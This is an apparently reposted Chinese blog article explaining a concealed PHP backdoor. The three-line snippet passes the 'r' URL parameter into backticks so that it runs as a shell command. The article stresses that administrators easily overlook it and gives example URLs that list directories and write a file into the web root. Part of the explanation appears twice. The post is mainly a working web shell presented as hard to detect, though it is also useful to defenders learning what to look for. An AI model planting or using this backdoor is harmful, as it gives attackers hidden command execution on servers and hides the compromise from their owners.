一个不易被发现的PHP后门代码解析
2014-07-05 00:00
501 查看
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。
伪装性很好,很容易被管理员忽略。
刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
伪装性很好,很容易被管理员忽略。
$selfNums = $_GET['r'];
if (isset($selfNums)){
echo `$selfNums`;
}刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,
而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),
通过 echo `系统命令`; 可以达到 system(); 一样的效果
如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php
我用 appserv 和虚拟主机已经测试成功。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一个不易被发现的PHP后门代码解析
- 一个php代码的日历表
- 发现一个不错的PHP网站
- 用php实现批量查询清除一句话后门的代码
- 如何简化php模板页面中分页代码的解析
- 中文WordPress工具箱(1.2)一个不易发现的bug
- 今天发现一个好网站 http://www.phpv.net/
- php intval的测试代码发现问题
- 一个图形显示IP的PHP程序代码
- 一个图形显示IP的PHP程序代码
- 发现一个SQLSERVER数据库的编绎解析问题
- 一个可以解析嵌套IIF语句的代码
- 今天发现一个以前写的管理代码片段的程序,把源码发出来!
- Beginning C# Objects从概念到代码——1.4 解析一个简单的C#程序
- 发一个flash+PHP的简单上传代码
- 发现一个代码共享的网站
- HTMLParser(一个比较流行的html代码解析、处理开源项目)学习,总结
- 一个自定义位数的php多用户计数器代码
- 中文WordPress工具箱(1.2)一个不易发现的bug
- php intval的测试代码发现问题